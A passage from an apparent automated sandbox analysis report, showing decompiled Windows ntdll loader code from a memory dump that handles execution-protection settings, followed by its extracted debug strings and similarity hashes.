                                                								goto L27;
                                                							}
                                                							do {
                                                								L27:
                                                								_t85 = E01321150(_t106, 0x20);
                                                								__eflags = _t85;
                                                								if(__eflags != 0) {
                                                									__eflags = 0;
                                                									 *_t85 = 0;
                                                								}
                                                								E01365720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                								_t112 = _t112 + 0x10;
                                                								E01353E13(_t105, _t106, __eflags);
                                                								__eflags = _t85;
                                                								if(_t85 == 0) {
                                                									goto L8;
                                                								}
                                                								_t41 = _t85 + 2; // 0x2
                                                								_t106 = _t41;
                                                								__eflags = _t106 - _v556;
                                                							} while (_t106 < _v556);
                                                							goto L8;
                                                						}
                                                						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                						_push(3);
                                                						_push(0x55);
                                                						E01365720();
                                                						goto L15;
                                                					}
                                                					L8:
                                                					_t56 = E012D41F7(_t105);
                                                					__eflags = _t56;
                                                					if(_t56 != 0) {
                                                						goto L15;
                                                					}
                                                					_t103 = _v552;
                                                					goto L10;
                                                				} else {
                                                					L4:
                                                					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                					goto L5;
                                                				}
                                                			}

                                                Strings
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013304BF
                                                • ExecuteOptions, xrefs: 0133050A
                                                • Execute=1, xrefs: 0133057D
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 0133058F
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01330566
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013305AC
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 013305F1
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 4ea28d141738b291f012b41efa1a48c9ddf12aa8bb3144ac732303972ece37b0
                                                • Instruction ID: 64ce5eee2a1eaf60922b226db2e41ba2c8328241d88010e2286a53a69035833c
                                                • Opcode Fuzzy Hash: 4ea28d141738b291f012b41efa1a48c9ddf12aa8bb3144ac732303972ece37b0
                                                • Instruction Fuzzy Hash: A7614A3171025ABAEF24FAA8DC85FFA77BCEF64354F0401A9E605A7580D770DA418B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%